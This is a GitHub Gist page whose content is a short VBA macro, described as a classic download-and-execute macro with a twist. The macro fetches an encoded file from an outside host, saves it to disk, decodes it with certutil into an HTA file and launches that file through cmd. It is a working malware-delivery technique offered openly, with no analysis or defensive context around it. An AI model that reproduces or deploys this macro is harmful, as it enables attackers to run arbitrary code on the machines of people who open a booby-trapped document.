Created
March 11, 2019 23:21
-
-
Save JPMonglis/1143a407f93a715b72ceab2665978f49 to your computer and use it in GitHub Desktop.
The classic download and execute macro, with a twist
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Sub DownloadAndExec() | |
| Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP") | |
| Dim bStrm: Set bStrm = CreateObject("Adodb.Stream") | |
| xHttp.Open "GET", "https://trusted.domain/encoded.crt", False | |
| xHttp.Send | |
| With bStrm | |
| .Type = 1 '//binary | |
| .Open | |
| .write xHttp.responseBody | |
| .savetofile "encoded.crt", 2 '//overwrite | |
| End With | |
| Shell ("cmd /c certutil -decode encoded.crt encoded.hta & start encoded.hta") | |
| End Sub |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment